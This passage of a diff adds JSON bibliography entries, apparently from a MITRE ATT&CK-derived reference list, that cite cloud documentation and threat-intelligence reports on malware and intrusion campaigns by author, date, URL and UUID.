"f2887980-569a-4bc2-949e-bd8ff266c43c", + "value": "AWS Get Public Access Block" + }, + { + "description": "Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February 14, 2022.", + "meta": { + "date_accessed": "2022-02-14T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html" + ], + "source": "MITRE", + "title": "AWS HeadBucket" + }, + "related": [], + "uuid": "1388a78e-9f86-4927-a619-e0fcbac5b7a1", + "value": "AWS Head Bucket" + }, + { + "description": "Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "refs": [ + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/" + ], + "source": "MITRE", + "title": "AWS IAM Privilege Escalation – Methods and Mitigation" + }, + "related": [], + "uuid": "693e5783-4aa1-40ce-8080-cec01c3e7b59", + "value": "Rhino Security Labs AWS Privilege Escalation" + }, + { + "description": "Adam Chester. (2020, February 25). AWS Lambda Redirector. Retrieved July 8, 2022.", + "meta": { + "date_accessed": "2022-07-08T00:00:00Z", + "date_published": "2020-02-25T00:00:00Z", + "refs": [ + "https://blog.xpnsec.com/aws-lambda-redirector/" + ], + "source": "MITRE", + "title": "AWS Lambda Redirector" + }, + "related": [], + "uuid": "9ba87a5d-a140-4959-9905-c4a80e684d56", + "value": "AWS Lambda Redirector" + }, + { + "description": "Spencer Gietzen. (n.d.). AWS Simple Storage Service S3 Ransomware Part 2: Prevention and Defense. Retrieved March 21, 2023.", + "meta": { + "date_accessed": "2023-03-21T00:00:00Z", + "refs": [ + "https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/" + ], + "source": "MITRE", + "title": "AWS Simple Storage Service S3 Ransomware Part 2: Prevention and Defense" + }, + "related": [], + "uuid": "785c6b11-c5f0-5cb4-931b-cf75fcc368a1", + "value": "Rhino Security Labs AWS S3 Ransomware" + }, + { + "description": "AWS. (n.d.). AWS Systems Manager Run Command. Retrieved March 13, 2023.", + "meta": { + "date_accessed": "2023-03-13T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html" + ], + "source": "MITRE", + "title": "AWS Systems Manager Run Command" + }, + "related": [], + "uuid": "ef66f17b-6a5b-5eb8-83de-943e2bddd114", + "value": "AWS Systems Manager Run Command" + }, + { + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2019-04-12T00:00:00Z", + "refs": [ + "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/" + ], + "source": "MITRE", + "title": "A XENOTIME to Remember: Veles in the Wild" + }, + "related": [], + "uuid": "e2f246d8-c75e-4e0f-bba8-869d82be26da", + "value": "Pylos Xenotime 2019" + }, + { + "description": "Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.", + "meta": { + "date_accessed": "2018-03-19T00:00:00Z", + "date_published": "2018-01-11T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x26.html" + ], + "source": "MITRE", + "title": "Ay MaMi" + }, + "related": [], + "uuid": "1b1d656c-4fe6-47d1-9ce5-a70c33003507", + "value": "objective-see ay mami 2018" + }, + { + "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.", + "meta": { + "date_accessed": "2019-10-06T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest" + ], + "source": "MITRE", + "title": "az ad user" + }, + "related": [], + "uuid": "cfd94553-272b-466b-becb-3859942bcaa5", + "value": "Microsoft AZ CLI" + }, + { + "description": "Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2020-12-09T00:00:00Z", + "refs": [ + "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/" + ], + "source": "MITRE", + "title": "A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy" + }, + "related": [], + "uuid": "88d8a3b7-d994-4fd2-9aa1-83b79bccda7e", + "value": "Intezer Russian APT Dec 2020" + }, + { + "description": "Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020.", + "meta": { + "date_accessed": "2020-10-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete" + ], + "source": "MITRE", + "title": "az monitor diagnostic-settings" + }, + "related": [], + "uuid": "6ddd92ee-1014-4b7a-953b-18ac396b100e", + "value": "az monitor diagnostic-settings" + }, + { + "description": "Microsoft. (2020, September 16). Azure Active Directory security operations for devices. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2020-09-16T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices" + ], + "source": "MITRE", + "title": "Azure Active Directory security operations for devices" + }, + "related": [], + "uuid": "eeba5eab-a9d8-55c0-b555-0414f65d2c2d", + "value": "Microsoft Azure AD Security Operations for Devices" + }, + { + "description": "Microsoft . (2022, September 16). Azure Active Directory security operations guide. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2022-09-16T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-introduction" + ], + "source": "MITRE", + "title": "Azure Active Directory security operations guide" + }, + "related": [], + "uuid": "b75a3f28-a028-50e6-b971-cc85e7d52e0c", + "value": "Microsoft Azure Active Directory security operations guide" + }, + { + "description": "Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers. Retrieved September 28, 2022.", + "meta": { + "date_accessed": "2022-09-28T00:00:00Z", + "date_published": "2019-02-18T00:00:00Z", + "refs": [ + "https://blog.xpnsec.com/azuread-connect-for-redteam/" + ], + "source": "MITRE", + "title": "Azure AD Connect for Red Teamers" + }, + "related": [], + "uuid": "0b9946ff-8c1c-4d93-8401-e1e4dd186305", + "value": "Azure AD Connect for Read Teamers" + }, + { + "description": "Microsoft. (2014, December 12). Azure/azure-powershell. Retrieved March 24, 2023.", + "meta": { + "date_accessed": "2023-03-24T00:00:00Z", + "date_published": "2014-12-12T00:00:00Z", + "refs": [ + "https://github.com/Azure/azure-powershell" + ], + "source": "MITRE", + "title": "Azure/azure-powershell" + }, + "related": [], + "uuid": "3b17b649-9efa-525f-aa49-cf6c9ad559d7", + "value": "Microsoft - Azure PowerShell" + }, + { + "description": "Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://azure.microsoft.com/en-us/services/storage/blobs/" + ], + "source": "MITRE", + "title": "Azure Blob Storage" + }, + "related": [], + "uuid": "7a392b85-872a-4a5a-984c-185a8e8f8a3f", + "value": "Azure Blob Storage" + }, + { + "description": "Microsoft. (2021, February 21). Azure Instance Metadata Service (Windows). Retrieved April 2, 2021.", + "meta": { + "date_accessed": "2021-04-02T00:00:00Z", + "date_published": "2021-02-21T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows" + ], + "source": "MITRE", + "title": "Azure Instance Metadata Service (Windows)" + }, + "related": [], + "uuid": "66e93b75-0067-4cdb-b695-8f8109ef26e0", + "value": "Microsoft Azure Instance Metadata 2021" + }, + { + "description": "Microsoft. (2023, August 30). Azure Policy built-in policy definitions. Retrieved September 5, 2023.", + "meta": { + "date_accessed": "2023-09-05T00:00:00Z", + "date_published": "2023-08-30T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute" + ], + "source": "MITRE", + "title": "Azure Policy built-in policy definitions" + }, + "related": [], + "uuid": "761d102e-768a-5536-a098-0b1819029d33", + "value": "Microsoft Azure Policy" + }, + { + "description": "Andy Robbins. (2021, October 12). Azure Privilege Escalation via Service Principal Abuse. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2021-10-12T00:00:00Z", + "refs": [ + "https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5" + ], + "source": "MITRE", + "title": "Azure Privilege Escalation via Service Principal Abuse" + }, + "related": [], + "uuid": "5dba5a6d-465e-4489-bc4d-299a891b62f6", + "value": "SpecterOps Azure Privilege Escalation" + }, + { + "description": "Microsoft. (n.d.). Azure products. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://azure.microsoft.com/en-us/services/" + ], + "source": "MITRE", + "title": "Azure products" + }, + "related": [], + "uuid": "12a72e05-ada4-4f77-8d6e-03024f88cab6", + "value": "Azure Products" + }, + { + "description": "Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.", + "meta": { + "date_accessed": "2020-06-17T00:00:00Z", + "date_published": "2019-05-20T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/rest/api/resources/" + ], + "source": "MITRE", + "title": "Azure Resource Manager" + }, + "related": [], + "uuid": "223cc020-e88a-4236-9c34-64fe606a1729", + "value": "Azure - Resource Manager API" + }, + { + "description": "Adrien Bataille, Anders Vejlby, Jared Scott Wilson, and Nader Zaveri. (2021, December 14). Azure Run Command for Dummies. Retrieved March 13, 2023.", + "meta": { + "date_accessed": "2023-03-13T00:00:00Z", + "date_published": "2021-12-14T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/azure-run-command-dummies" + ], + "source": "MITRE", + "title": "Azure Run Command for Dummies" + }, + "related": [], + "uuid": "e15d38de-bc15-525b-bd03-27c0edca768d", + "value": "Mandiant Azure Run Command 2021" + }, + { + "description": "Microsoft. (2022, November 14). Azure security baseline for Azure Active Directory. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2022-11-14T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/aad-security-baseline" + ], + "source": "MITRE", + "title": "Azure security baseline for Azure Active Directory" + }, + "related": [], + "uuid": "2bc66dc9-2ed2-52ad-8ae2-5497be3b0c53", + "value": "Microsoft Azure security baseline for Azure Active Directory" + }, + { + "description": "Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.", + "meta": { + "date_accessed": "2020-12-30T00:00:00Z", + "date_published": "2020-12-01T00:00:00Z", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml" + ], + "source": "MITRE", + "title": "Azure Sentinel Detections" + }, + "related": [], + "uuid": "34314090-33c2-4276-affa-3d0b527bbcef", + "value": "Microsoft - Azure Sentinel ADFSDomainTrustMods" + }, + { + "description": "Microsoft. (2022, October 17). Azure Serial Console. Retrieved June 2, 2023.", + "meta": { + "date_accessed": "2023-06-02T00:00:00Z", + "date_published": "2022-10-17T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/serial-console-overview" + ], + "source": "MITRE", + "title": "Azure Serial Console" + }, + "related": [], + "uuid": "fd75d136-e818-5233-b2c2-5d8ed033b9e6", + "value": "Azure Serial Console" + }, + { + "description": "Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2019-03-20T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide" + ], + "source": "MITRE", + "title": "Azure Storage security guide" + }, + "related": [], + "uuid": "95bda448-bb13-4fa6-b663-e48a9d1b866f", + "value": "Microsoft Azure Storage Security, 2019" + }, + { + "description": "Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June 17, 2020.", + "meta": { + "date_accessed": "2020-06-17T00:00:00Z", + "date_published": "2020-01-01T00:00:00Z", + "refs": [ + "https://github.com/Azure/Stormspotter" + ], + "source": "MITRE", + "title": "Azure Stormspotter GitHub" + }, + "related": [], + "uuid": "42383ed1-9705-4313-8068-28a22a23f50e", + "value": "Azure - Stormspotter" + }, + { + "description": "Sebdraven. (2021, February 8). Babuk is distributed packed. Retrieved August 11, 2021.", + "meta": { + "date_accessed": "2021-08-11T00:00:00Z", + "date_published": "2021-02-08T00:00:00Z", + "refs": [ + "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62" + ], + "source": "MITRE", + "title": "Babuk is distributed packed" + }, + "related": [], + "uuid": "58759b1c-8e2c-44fa-8e37-8bf7325c330d", + "value": "Medium Babuk February 2021" + }, + { + "description": "Sogeti. (2021, March). Babuk Ransomware. Retrieved August 11, 2021.", + "meta": { + "date_accessed": "2021-08-11T00:00:00Z", + "date_published": "2021-03-01T00:00:00Z", + "refs": [ + "https://www.sogeti.com/globalassets/reports/cybersecchronicles_-_babuk.pdf" + ], + "source": "MITRE", + "title": "Babuk Ransomware" + }, + "related": [], + "uuid": "e85e3bd9-6ddc-4d0f-a16c-b525a75baa7e", + "value": "Sogeti CERT ESEC Babuk March 2021" + }, + { + "description": "Lim, M.. (2019, April 26). BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat . Retrieved October 7, 2019.", + "meta": { + "date_accessed": "2019-10-07T00:00:00Z", + "date_published": "2019-04-26T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/" + ], + "source": "MITRE", + "title": "BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat" + }, + "related": [], + "uuid": "c020569d-9c85-45fa-9f0b-97be5bdbab08", + "value": "Unit42 BabyShark Apr 2019" + }, + { + "description": "Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.", + "meta": { + "date_accessed": "2018-02-21T00:00:00Z", + "date_published": "2012-05-15T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99" + ], + "source": "MITRE", + "title": "Backdoor.Briba" + }, + "related": [], + "uuid": "bcf0f82b-1b26-4c0c-905e-0dd8b88d0903", + "value": "Symantec Briba May 2012" + }, + { + "description": "Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019.", + "meta": { + "date_accessed": "2019-03-07T00:00:00Z", + "date_published": "2017-08-07T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/" + ], + "source": "MITRE", + "title": "Backdoor-carrying Emails Set Sights on Russian-speaking Businesses" + }, + "related": [], + "uuid": "efeb475c-2a7c-4ab6-814d-3ee7866fa322", + "value": "TrendMicro Squiblydoo Aug 2017" + }, + { + "description": "Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.", + "meta": { + "date_accessed": "2018-02-23T00:00:00Z", + "date_published": "2005-08-18T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99" + ], + "source": "MITRE", + "title": "Backdoor.Darkmoon" + }, + "related": [], + "uuid": "7088234d-a6fc-49ad-b4fd-2fe8ca333c1d", + "value": "Symantec Darkmoon Aug 2005" + }, + { + "description": "Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021", + "meta": { + "date_accessed": "2021-09-01T00:00:00Z", + "date_published": "2021-06-10T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/" + ], + "source": "MITRE, Tidal Cyber", + "title": "BackdoorDiplomacy: Upgrading from Quarian to Turian" + }, + "related": [], + "uuid": "127d4b10-8d61-4bdf-b5b9-7d86bbc065b6", + "value": "ESET BackdoorDiplomacy Jun 2021" + }, + { + "description": "Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "date_published": "2016-07-09T00:00:00Z", + "refs": [ + "https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9" + ], + "source": "MITRE", + "title": "Backdooring an AWS account" + }, + "related": [], + "uuid": "2c867527-1584-44f7-b5e5-8ca54ea79619", + "value": "Backdooring an AWS account" + }, + { + "description": "Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.", + "meta": { + "date_accessed": "2018-02-23T00:00:00Z", + "date_published": "2012-05-15T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051605-2535-99" + ], + "source": "MITRE", + "title": "Backdoor.Linfo" + }, + "related": [], + "uuid": "e6b88cd4-a58e-4139-b266-48d0f5957407", + "value": "Symantec Linfo May 2012" + }, + { + "description": "Stama, D.. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016.", + "meta": { + "date_accessed": "2016-02-15T00:00:00Z", + "date_published": "2015-02-06T00:00:00Z", + "refs": [ + "http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2" + ], + "source": "MITRE", + "title": "Backdoor.Mivast" + }, + "related": [], + "uuid": "800780e3-7d00-4cfc-8458-74fe17da2f71", + "value": "Symantec Backdoor.Mivast" + }, + { + "description": "Ladley, F. (2012, May 15). Backdoor.Nerex. Retrieved February 23, 2018.", + "meta": { + "date_accessed": "2018-02-23T00:00:00Z", + "date_published": "2012-05-15T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99" + ], + "source": "MITRE", + "title": "Backdoor.Nerex" + }, + "related": [], + "uuid": "1613fd6b-4d62-464b-9cda-6f7d3f0192e1", + "value": "Symantec Nerex May 2012" + }, + { + "description": "Sponchioni, R.. (2016, March 11). Backdoor.Nidiran. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2016-03-11T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99" + ], + "source": "MITRE", + "title": "Backdoor.Nidiran" + }, + "related": [], + "uuid": "01852772-c333-47a3-9e3f-e234a87f0b9b", + "value": "Symantec Backdoor.Nidiran" + }, + { + "description": "Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.", + "meta": { + "date_accessed": "2016-08-17T00:00:00Z", + "date_published": "2016-08-08T00:00:00Z", + "refs": [ + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" + ], + "source": "MITRE", + "title": "Backdoor.Remsec indicators of compromise" + }, + "related": [], + "uuid": "b00bf616-96e6-42c9-a56c-380047ad5acb", + "value": "Symantec Remsec IOCs" + }, + { + "description": "Ladley, F. (2012, May 15). Backdoor.Ritsol. Retrieved February 23, 2018.", + "meta": { + "date_accessed": "2018-02-23T00:00:00Z", + "date_published": "2012-05-15T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3909-99" + ], + "source": "MITRE", + "title": "Backdoor.Ritsol" + }, + "related": [], + "uuid": "1c8b1762-8abd-479b-b78c-43d8c7be7c27", + "value": "Symantec Ristol May 2012" + }, + { + "description": "Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.", + "meta": { + "date_accessed": "2018-02-22T00:00:00Z", + "date_published": "2012-05-15T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-5938-99" + ], + "source": "MITRE", + "title": "Backdoor.Vasport" + }, + "related": [], + "uuid": "2dc7d7fb-3d13-4647-b15b-5e501946d606", + "value": "Symantec Vasport May 2012" + }, + { + "description": "FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "refs": [ + "https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml" + ], + "source": "MITRE", + "title": "Backdoor - W32/Hupigon.EMV - Threat Description" + }, + "related": [], + "uuid": "08ceb57f-065e-45e9-98e9-d58a92caa755", + "value": "FSecure Hupigon" + }, + { + "description": "Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.", + "meta": { + "date_accessed": "2018-02-22T00:00:00Z", + "date_published": "2012-05-15T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99" + ], + "source": "MITRE", + "title": "Backdoor.Wiarp" + }, + "related": [], + "uuid": "78285833-4b0d-4077-86d2-f34b010a5862", + "value": "Symantec Wiarp May 2012" + }, + { + "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.", + "meta": { + "date_accessed": "2018-09-06T00:00:00Z", + "date_published": "2009-05-17T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A" + ], + "source": "MITRE", + "title": "Backdoor:Win32/Lamin.A" + }, + "related": [], + "uuid": "84b8b159-6e85-4329-8903-aca156f4ed84", + "value": "Microsoft Lamin Sept 2017" + }, + { + "description": "McCormack, M. (2017, September 15). Backdoor:Win32/Poisonivy.E. Retrieved December 21, 2020.", + "meta": { + "date_accessed": "2020-12-21T00:00:00Z", + "date_published": "2017-09-15T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor%3aWin32%2fPoisonivy.E" + ], + "source": "MITRE", + "title": "Backdoor:Win32/Poisonivy.E" + }, + "related": [], + "uuid": "fc97a89c-c912-4b0c-b151-916695dbbca4", + "value": "Microsoft PoisonIvy 2017" + }, + { + "description": "Microsoft. (2017, September 15). Backdoor:Win32/Truvasys.A!dha. Retrieved November 30, 2017.", + "meta": { + "date_accessed": "2017-11-30T00:00:00Z", + "date_published": "2017-09-15T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha" + ], + "source": "MITRE", + "title": "Backdoor:Win32/Truvasys.A!dha" + }, + "related": [], + "uuid": "3c8ba6ef-8edc-44bf-9abe-655ba0f45912", + "value": "Microsoft Win Defender Truvasys Sep 2017" + }, + { + "description": "Microsoft. (2017, November 9). Backdoor:Win32/Wingbird.A!dha. Retrieved November 27, 2017.", + "meta": { + "date_accessed": "2017-11-27T00:00:00Z", + "date_published": "2017-11-09T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Wingbird.A!dha" + ], + "source": "MITRE", + "title": "Backdoor:Win32/Wingbird.A!dha" + }, + "related": [], + "uuid": "6c7e2b89-8f3a-443c-9b72-12934b9dc364", + "value": "Microsoft Wingbird Nov 2017" + }, + { + "description": "Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.", + "meta": { + "date_accessed": "2018-01-12T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx" + ], + "source": "MITRE", + "title": "Background Intelligent Transfer Service" + }, + "related": [], + "uuid": "3d925a69-35f3-4337-8e1e-275de4c1783e", + "value": "Microsoft BITS" + }, + { + "description": "NCC Group Research Blog. (2022, August 19). Back in Black: Unlocking a LockBit 3.0 Ransomware Attack. Retrieved May 7, 2023.", + "meta": { + "date_accessed": "2023-05-07T00:00:00Z", + "date_published": "2022-08-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/" + ], + "source": "Tidal Cyber", + "title": "Back in Black: Unlocking a LockBit 3.0 Ransomware Attack" + }, + "related": [], + "uuid": "8c1fbe98-5fc1-4e67-9b96-b740ffc9b1ae", + "value": "NCC Group Research Blog August 19 2022" + }, + { + "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.", + "meta": { + "date_accessed": "2019-10-08T00:00:00Z", + "date_published": "2012-03-20T00:00:00Z", + "refs": [ + "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/" + ], + "source": "MITRE", + "title": "Backing up and restoring snapshots on Amazon EC2 machines" + }, + "related": [], + "uuid": "bfe848a3-c855-4bca-a6ea-44804d48c7eb", + "value": "Tech Republic - Restore AWS Snapshots" + }, + { + "description": "Counter Threat Unit Research Team. (2018, August 24). Back to School: COBALT DICKENS Targets Universities. Retrieved February 3, 2021.", + "meta": { + "date_accessed": "2021-02-03T00:00:00Z", + "date_published": "2018-08-24T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities" + ], + "source": "MITRE", + "title": "Back to School: COBALT DICKENS Targets Universities" + }, + "related": [], + "uuid": "addbb46b-b2b5-4844-b4be-f6294cf51caa", + "value": "Secureworks COBALT DICKENS August 2018" + }, + { + "description": "Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.", + "meta": { + "date_accessed": "2020-11-06T00:00:00Z", + "date_published": "2020-11-02T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" + ], + "source": "MITRE, Tidal Cyber", + "title": "Back to the Future: Inside the Kimsuky KGH Spyware Suite" + }, + "related": [], + "uuid": "ecc2f5ad-b2a8-470b-b919-cb184d12d00f", + "value": "Cybereason Kimsuky November 2020" + }, + { + "description": "Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.", + "meta": { + "date_accessed": "2021-05-04T00:00:00Z", + "date_published": "2021-03-30T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential" + ], + "source": "MITRE", + "title": "BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns" + }, + "related": [], + "uuid": "5ba4217c-813b-4cc5-b694-3a4dcad776e4", + "value": "Proofpoint TA453 March 2021" + }, + { + "description": "Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.", + "meta": { + "date_accessed": "2018-11-13T00:00:00Z", + "date_published": "2017-10-20T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/" + ], + "source": "MITRE", + "title": "BadPatch" + }, + "related": [], + "uuid": "9c294bf7-24ba-408a-90b8-5b9885838e1b", + "value": "Unit 42 BadPatch Oct 2017" + }, + { + "description": "M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.", + "meta": { + "date_accessed": "2021-01-28T00:00:00Z", + "date_published": "2017-10-24T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + ], + "source": "MITRE", + "title": "Bad Rabbit: Not‑Petya is back with improved ransomware" + }, + "related": [], + "uuid": "a9664f01-78f0-4461-a757-12f54ec99a56", + "value": "ESET Bad Rabbit" + }, + { + "description": "Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.", + "meta": { + "date_accessed": "2021-01-28T00:00:00Z", + "date_published": "2017-10-24T00:00:00Z", + "refs": [ + "https://securelist.com/bad-rabbit-ransomware/82851/" + ], + "source": "MITRE", + "title": "Bad Rabbit ransomware" + }, + "related": [], + "uuid": "f4cec03a-ea94-4874-9bea-16189e967ff9", + "value": "Secure List Bad Rabbit" + }, + { + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.", + "meta": { + "date_accessed": "2021-02-08T00:00:00Z", + "date_published": "2020-10-01T00:00:00Z", + "refs": [ + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + ], + "source": "MITRE", + "title": "BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps" + }, + "related": [], + "uuid": "872c377b-724b-454c-8432-e38062a7c331", + "value": "BlackBerry Bahamut" + }, + { + "description": "Duncan, I., Campbell, C. (2019, May 7). Baltimore city government computer network hit by ransomware attack. Retrieved July 29, 2019.", + "meta": { + "date_accessed": "2019-07-29T00:00:00Z", + "date_published": "2019-05-07T00:00:00Z", + "refs": [ + "https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html" + ], + "source": "MITRE", + "title": "Baltimore city government computer network hit by ransomware attack" + }, + "related": [], + "uuid": "f578de81-ea6b-49d0-9a0a-111e07249cd8", + "value": "BaltimoreSun RobbinHood May 2019" + }, + { + "description": "Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021.", + "meta": { + "date_accessed": "2021-05-31T00:00:00Z", + "date_published": "2020-11-26T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2020/bandook-signed-delivered/" + ], + "source": "MITRE", + "title": "Bandook: Signed & Delivered" + }, + "related": [], + "uuid": 